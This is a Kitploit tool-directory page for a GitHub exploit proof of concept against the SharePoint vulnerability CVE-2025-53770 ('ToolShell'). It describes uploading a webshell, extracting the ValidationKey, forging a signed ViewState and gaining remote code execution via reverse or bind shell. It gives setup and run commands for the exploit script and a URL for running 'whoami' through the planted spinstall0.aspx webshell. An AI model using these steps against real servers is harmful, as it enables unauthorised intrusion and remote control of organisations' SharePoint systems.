Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Toolshell_CVE-2025-53770 | Kitploit
Tools/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubgreenforcenetworks/toolshell_cve-2025-53770

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Toolshell_CVE-2025-53770

View Repository
1 year agoNot yet reviewed

ToolShell → CVE‑2025‑53770 Exploit PoC

This package allows:

  1. Upload webshell to SharePoint
  2. Extract ValidationKey
  3. Generate signed ViewState
  4. RCE via reverse/bind shell

🔧 Setup

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 Running

Upload the webshell

From a SharePoint page you can access the page source .Just go to view source tab and From there if available you would get following, which can copy:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (any current __VIEWSTATE for context)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

This uploads spinstall0.aspx. Check: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

Download Tool